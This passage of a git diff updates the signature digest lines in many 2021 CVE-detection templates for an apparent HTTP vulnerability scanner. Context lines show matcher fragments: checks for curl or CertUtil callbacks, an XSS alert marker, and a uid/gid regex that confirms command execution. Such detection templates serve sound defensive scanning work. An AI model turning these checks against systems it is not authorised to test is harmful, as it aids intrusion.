end of file +# digest: 490a00463044022047a94956d0dce5fbe975b4a114d42b880079fb3bc63eb98ed3c8cd812fb2ae7602206c830f63a53f40ebb1e75f05b66028bd7a139bc67c7cb3b2b12ebf01275be12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index a8b57a3ffb..4a145fedf2 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a88f073b7af18401e8266c452e7918ef64d4ad02c5c4254fa02c8492c8d76b24022100efd86ff7c908c8cf283050af56d5e0a0d3ad3e0ccbf6e83fad3847d18c67d514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059f740a31b60ed89fa96f917d460c88ee8f530001b4a7f379d899dc654d4e1e002210091c3f5cd2ea67e6382a8ed4ee86abb86ff080cb39045dc5cb218b105ba8d67b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 722d97199c..be5aaf0cd2 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -61,4 +61,4 @@ http: regex: - 'base64\,(.*?)" border=' internal: true -# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e2ade4b508b5686bdc54cfab47f238ff3e8fc844a8366b4106961cb92039cc0022042c8c944336adb6a908681f0f573fd55b7edad4d092b8541f59b9cd61d0a5d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 6aa7cb7021..5b40ce2d30 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220593509be71e4f3c4a93f5218c7615fc4b876c64259f2151d89a663d9d11aa510022100f6a0490be29ac53bcba0d368c4835cfaa80d384c4a9dc507896e7f02f69c17fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd1f32eb36b6035b0ab7f8b1fd9e4f02e325c7e4b474c628e644df44bb3af568022100cfb516b81e4a86ee5ac1a0945ed498edfb269459faacf498d3bada550d236674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 071484bb54..61550d85a1 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5269fa87351d0696eac2e95e1558c38cd483f64636dfa7e5bc81d5163b7b62202207e03da1ef5a15578b63bcf7eb06bdeb739b2be4c416e405414671458a866eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 28248f1a86..5be447025c 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b3f1f755c121ccb9a251c16ad6e7453fc09afe729910ba0627eaa855d04e7f70220147595c2aad515d0ffa806be04849a7530d35e3b15e3b587f301e54c4b30f9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220334d3d1d497475f923737b75e9cb56b5d6eef6a7f382f67094e470a31dfd780e0220516f25b00740a8be2a78f7ed4c4900ecf0dc490c0ce18f7a6077f7c52af1c644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 1f81232d74..212528a2d1 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f59adf2060e9bd5cd6778f48d141f1bd0ac128d97a8dde7e931d4f3135d0e887022100f9c874e8c0cc7c2e23d9bd5f892e66fb4e28e818ba92abb6ccc29c10c845173e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203158e583871baabbe12802cc13a547061a472688943ddb5862a8dcd926e6f4e102203e86aded4c5885c971f7f95907d3cd1ebf7e061e61b84f1d317a7eb61eece2e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 3ae73bde55..9404822723 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -63,4 +63,4 @@ http: regex: - '' part: body -# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038ef14fb949ecb26cf6e0bc275a460726d05e4f4ceb3d08e7f7b342100a684e9022100f038da88e0118652d8fadbf5aac6cc91b63489161e655adbe20e75b812e07b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index c9eb02de23..17181f13bd 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f0a5616189deeabf3e79f051b432366c41cb9047616bab48038d28d6a4a3d4f022100be9594b79e5243c7cd077e3d67335eb3b3e962999dcc5452ca48888a6980a322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index b929baf24f..674c054012 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -46,4 +46,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100a120fefbb36e69c70d4665614d7579e6da2abee8955d5686ba345bf0c8600bdb022100eb3394e9cd130d5934476c1186acd108ebc7cf70016720dc85dc8f8275b2e246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f344e356724b4867ba4fb238497fcff0e4538849f163149d32ad25e30b58cfa022012e555c306ec33d8bc11d345f9698cc61df83b720b151bf6a836531b1880a470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ab601590d4..ab5ea8fd80 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df8a1aaafef027c9a7ca24c450e8badd81d220552eb1a666e614ad749dc840a1022100b5a9b3f7999c6dcc0a7ecb7faca88b99f4d698e20e00de8db760c1b05f4db7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 163616cab2..00404bf428 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220278c989b9dc1803a0640da64a5a9b5d1f8dc007e0d7b724e3218b431ffc98f2f022100f203b37e7d96545de9a199b34f1bab451c9ec9b3825d84d3ff9db7e9c3694bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093e236295624cdd2b6ddd07e3e2c61ac5127edde64704208f291d22445184eee022100d3dbff486435aa66a098616c46d66f71d61c39433e3d1cc85e7fc90a0d273d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 9311a11cee..ef1406f42d 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d0675892f5cec9c4449982110497fde27efa75037b1885e51f4b4dcf0340a1db022100c191c1f76092756f549a6f2692918433952d4d0a25a3c7f4833c36650fa39e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201053fc6d9eceb86b62e93604a3bb4c29decb102730218d85e6ef2b34a648b3ee022100ae116fb72e469550e5d59d9c19d4f3769e73cd39e1be7a477680fe139e94be0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 978526cbcb..efd063967d 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcef1f5ce44b42760b65c7e2db5338fb632c4ccd0bfd4310e82dbe0d770bb5bf02206a043d2ea795f135c9491381f341986b98d0fa25a228fc71601bf71490468d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 046ea30d46..0574b198c8 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -58,4 +58,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 490a00463044022033ebb435f1795b6a06bd29b9bee7de4e687a08dc848035c641304f25a05044420220421167babce74e7aa10b543e135d291d7ec87aeacc8ca03950f34bd210e9ea7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009732ad4945c244188180652f1736283552377e3e7c5f53c278f644613db66669022052df00ef7d96c9f01effd1d88de3f11677afa20ec88ef825437b8ebfd82a3e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 0dcd5d7810..fc37f12b07 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -53,4 +53,4 @@ http: - type: word words: - "We encountered an internal error" -# digest: 490a004630440220193a42a5351b971d266989af20781c196488aca759067dbc1f0e8f2308d5c64802206f9ed4e250e668bc8a8acae05ca9632ea520a07ef3eca8bee272b8bdd6cc44bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e6e0482e52fd2746a9e615d4955f9dfcb23d28c2cd84c11097ae301c481f98a0220315895908f6f6d8106063b05eae0206e8a4b1d6d62b8580dad337f5e740d44c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index e2e9ac43d4..15bc972a3d 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -91,4 +91,4 @@ http: - type: regex regex: - "(u|g)id=.*" -# digest: 4b0a00483046022100dcc24fb2eb777eff956bdecff0f00a86f51d0137fee0f7436e9a61d975a3f83d022100d09f18044914a741d17e4d1c9f15f0c229d19093066f6e7ee379376d585ed0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d3958e2205541727edfc0220248d3d5bb9bcda9884e707e81a5b962adc9ea8a02203c5be8f6e614ee645c8a09df29eda44f5d8c262c4f4da023266c8c652323cb0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index df6c703fbd..c9271506d0 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 403 -# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5a7a38e72025ea7caccd5390dc5ccf22e5473725508efdf2b1db3e5074996830221008af3661d932d485a489222e268206934fde7cb4e4db9327c708e005ad6fcadc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 93f82c7acb..d24ff609f2 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -133,4 +133,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008cbb90b9662cacdf1efc170626c20af2af061774641c11e1926b782d0821b4d3022008ef1eecb9e827b845861832ce5f2e9b8300d3ac1fedf863de930e3c5b08bec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 809ad1e94d..a3e59d41d6 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0e1b8d49d9fe1a59d88506d5d75e0740c560db375170a3e174b0f722115311a022100fc37abd7b4479a1a735a9447124a0e20493872640be3cca1318a98db23cb9662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100885cd6ea86ca04ca6daedbe83a0849b14dec28669707ea627bc4c28c09150aec022100c2c529caacdd52e2f407a4f5b40faa2511d55958f6151f7b0de27832361574bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index b29c1d6991..5b4343b512 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099094cb8ddabbb62ae1c1a3278524ca37c02baabbb89430ec56c39a6591a9f9a02201e01bb5340f1cec11d2ba496fd3b176816decd82aa4f21cff997ada5c09963fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c6446203bad1ef26dc458b3e075267a212ac9b442e2b33f2b6f98ae9d45ae2902204af8a0a9618ed7288407094e7c2a3d39a8a0d112c94511dac122099868f3dfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 669340fd67..b603fb1d47 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e6426cc572101b45641c767c7e539db75a145714644272d3d163df59b5ea2aa022015d94f5ac290e8fb85ec786f4e590bdf9fe9fbd03a04357cc7dfa9cffa27e110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100887a67cc1c94cc474e1a368816599bc6702e406d95cb2fd1e52a2c13a002424a022100e9ef90a621e53ed008b5289dd3854af921b52f004fe421a07eff2dd2fe659bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 90883398a6..f24355aa4a 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf3f445ac2523e140ae589eedb4c723a9d60a1d3734ddf47f76c27ceebc054d4022100907ae703851cd94586106cb70d472adad6e98a3ec9113a16e806545245aaf46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4185e8f7ee6326b23eac3bb68f65bfb4a93391d156182a3e401fa906c9f3e6102201015bf2e1bfb158c19d5a9f9d65c391313584b46b8b20a4d14d5b79d2413bb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 85cb9026c6..c062217bfa 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206e315588ca65297173b6814bc6172397458309ebd730542d6d0aed165442ab5d022054bd3fded5b447cdb4d288ef12338c62319a42e3576f5cb78f32945ed424f4dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cc084a891afe65feaedc4d3bedf1a788cdda0c866607afffe419ee6c7a383be02201e523c62400ede7ae1a57e0e6def810eb9b32c0e745d04df46dffa1d099cdb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 2688c2f724..88f78c0f84 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028dd003a44a9702befd4cdafccf356aabf08e207ef3c8c0e5eb1d535064326b402205d4243a377e793952264578149afc3cdc9910c0e9726edeb5c3bcb82fcddd527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5a530dcbed5107a9a5669eb4ac1c9c26ad9330b52462591c4e0b8b257f53b7022001f4432c5b36fa5ad9816aef10bdb1a75f00e675d17a1d926bc031f6e06afe6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 24a6ed9c5f..0b9fe72f4c 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b65c1a7c0caee4cc49ce03a121778de8d65d17b11bb2394279d0fca029d611eb022100f2ce7dd5d0ac03d233b2fbb513a64ce3e55f76c813b11c6c83f7db84c7397774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd46af1935b78ddabc1df51e8d524d1eb0f1512af303e5782c69254e0ffc7b41022100d50646e7154c919aede3e7f7a7d121c3b53195dab4670007883da7f12d2e29a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 5a5e7ee01f..4f135e9f81 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220290c465e8ffed921fc075e33c05d61e6ad6c8dc976ad0768a3c67c27cf6c886d022015809e3ad84f8ad4271e11246380311837a9a3a71febd990084cb12f5a2a7961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ef243b14cb6e6a9ac0a8809f023d4ee4dcdc462a9eae9d526b1593a9a6d638d022100f4328f142294b05759c426f4c852868f8a12d870a7f9a3c162666f237f125101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index fe9d9b89f1..e258ea3eb1 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed5cb77663b1fa02a079d9ba371969da6ff88146c44decf1b1f53374283703ab022100c105fb80e89a73b650554efd5e75498fbd87feb1bc553f1b77e3985f208107a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 81b64d6de3..6338700fc8 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dec5bc6259fe2ebe995f7e00acc2aeae9d9f6ca2612511f10dec4db4e5aec09c022005b30572b35de55a0959da7910704be0e21d80767290799899204fbd718bdc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a935a2e83de4a7e04f4be120e042c42ababadca5c6eae96c4b1ab1c6cadbf627022100a9005c42b0b1f2dcfab48457002fc32029d03fd6e46f561f508c03c4621f7743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index e13d41f8d8..6bdc461f40 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -49,4 +49,4 @@ http: - "contains(body_1, 'VMware vSphere')" - "content_length_2 == 0" condition: and -# digest: 4a0a0047304502210096eeb1ab5ef33413e6827bc5c906e65ca58db66c0a4facc6185b209e745b14b7022003c37bb9242faba402e242e1e6d4443e7704ad4e1f9f5a437295a89d9a45f441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3cdb9bdf44186d52c6da410d81899c0228cc759fd45b311962db3edb8df80ee022100b6a85324e12cc4066bcd4f206f9ad888057aa8d4f0de24c90db0c5e32046ac9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index f3f34b8b6b..9ed5768217 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -47,4 +47,4 @@ http: part: interactsh_request regex: - 'curl|CertUtil' -# digest: 4a0a00473045022100b4d3fe94711032d1a972803e2c53190fdefe451c2d9218a6df5094091460bd3c022017cebf0f65907519fa5d09748a58c0d8480286435615ad8a2d569a9f669b6a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3d33b409d401a6c893da1d54129a4fe98ab40893e0f1015ffbc530d0a8a4dc7022020e8d50b4ee80bab89b60df1db166bbecd327512704970637085dd74e85225fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 391970c475..cf1cf472fe 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200640c5d5544ff6ef991bb415c29eb38caa4db8b69a6f71b9129970b31160c5d6022046e1514bce42721ffde6904f23c3bc950efb604d47d46454c3d9e77fcb54d9f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index b76ed058ac..c071ecba55 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -44,4 +44,4 @@ http: - "alert('document.domain')" - "No policy has been chosen." condition: and -# digest: 4a0a00473045022100c166482f4524b3791b930460c6d197fdf8604c263fd9455f9d2e32f58da90a5c022064d7ba4d9e05973aec6889fd5dc2a740add4ccd266523146f2df998b31ce8a66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f739400bf52f8dec1f217ed4d31b7f9f956aa0ca517d675ee5495ae2cd887b5c02207daaa0d190e01b48eef9b056c954a640ff59c3a9b91e4e624e6195e664a87e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index c89c8a3799..aadcacb2f6 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022014f0323c07e1c9f0a832d65c29ff4d67516455694fba9ccd53727b9fc4a6d38c022100fe6eb1ab330b614a4bd5dfc06532870a99005fcd2fabb1a02f2ed6cc21799534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ae0e81a1c19ce52ceb50640f4c1ab86ac60b6379dbbe6f47792a4572e351d0c02203f716a5a8e0d7c6faa8e9672792f913b374029ef53dff1690395b0a63e688dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index d81fa9d992..7acd120f1e 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -140,4 +140,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 490a00463044022021787cd9270a230364edc25682b32eedd71949d7c6a77c9b84308a540f85761502203bbfe2d4d8ee766566ca25be55039a765ee27d86e8b66ff4f6971796a255e1e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abc381440f9275837d7e15eedee65a255ebe4897cdd81a9ec8bddc15e9fff97f02204d5198bbdca5253fecaf70b30ba2a9cb00162a44795ea0769c8d3c00f92c72fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 84be035b41..c7acf1110c 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -53,4 +53,4 @@ http: part: body words: - "does not have valid YAML syntax" -# digest: 4b0a00483046022100ff420e3f4d9d72d0aa090c7edd70646581bc6078a639d8c4eecddd0e337109bc022100f49642428c995841527b11d305d4c38776bd64b61bd40052ed4faca9e93d9c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009043529bbd2ee9d188c51b061bf113c007b7479375096d44f609b5c3e2fc23c5022100917d35c7dd970f582fedd2c0f51529e96d71d76fe07d448ce3ffb17b392fb980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 991de64f34..20ad76d934 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dd62e40407144bfef7ec5c935ad7d0dbf6f7da3ab40ea8b5defb014c9292100022052c5c81fa72fdb0e69598dda215e657d24019497cffebb3dbad0988db0588af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 592773fda4..fde9c3bb60 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -51,4 